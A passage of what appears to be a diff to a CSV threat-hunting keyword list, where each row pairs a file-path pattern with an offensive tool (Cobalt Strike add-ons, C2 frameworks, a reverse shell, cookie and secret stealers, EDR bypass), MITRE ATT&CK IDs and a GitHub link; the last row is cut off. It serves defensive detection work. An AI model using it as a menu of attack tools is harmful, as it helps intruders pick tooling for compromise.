+"*/cna/pipetest.cna*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z"
+"*/Cneelis*","offensive_tool_keyword","Github Username","Github username Red teamer @ Outflank.Passionate about networking and cybersecurity. 
known for exploitation tools dev","N/A","N/A","N/A","N/A","POST Exploitation tools","https://twitter.com/Cneelis","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/co2-cewler/*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z"
+"*/co2-core/*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z"
+"*/co2-laudanum/*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z"
+"*/co2-sqlmapper/*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z"
+"*/coap-resources.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/cobaltclip.c*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,,
+"*/cobaltclip.o*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,,
+"*/Cobalt-Clip/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,,
+"*/cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and 
techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*/cobalt-strike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*/cobaltstrike/c2lint*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z"
+"*/CodeBuildLooter.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z"
+"*/coercer.egg-info*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z"
+"*/Coercer.git*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" 
+"*/Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z"
+"*/Coercer/*.py","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z"
+"*/coercer_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/CoffeeLdr.c*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z"
+"*/CoffeeLdr/*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z"
+"*/COFFLoader*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z"
+"*/COFFLoader2/*","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","156","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z"
+"*/collection/screengrab*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z"
+"*/com/blackh4t/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z"
+"*/combine_harvester.git*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z"
+"*/comfoo.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z"
+"*/COM-Hunter.csproj*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - 
TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z"
+"*/COM-Hunter.exe*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z"
+"*/COM-Hunter.git*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z"
+"*/COM-Hunter.sln*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z"
+"*/commandcontrol/malware*.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*/commando-vm*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z"
+"*/commix.git","offensive_tool_keyword","commix","Automated All-in-One OS command 
injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4035","782","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z"
+"*/commix.py*","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4035","782","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z"
+"*/common/beacon.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"*/common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*/completions/exegol.fish*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*/config/doNmapScanWin.bat *","offensive_tool_keyword","scan4all","Official 
repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*/ConPtyShell/*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z"
+"*/ContainYourself.git*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z"
+"*/CookieProcessor.cs*","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","104","14","2023-05-28T18:41:15Z","2023-05-28T18:30:02Z"
+"*/Cooolis-ms/*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*/core/browser_darwin.go*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 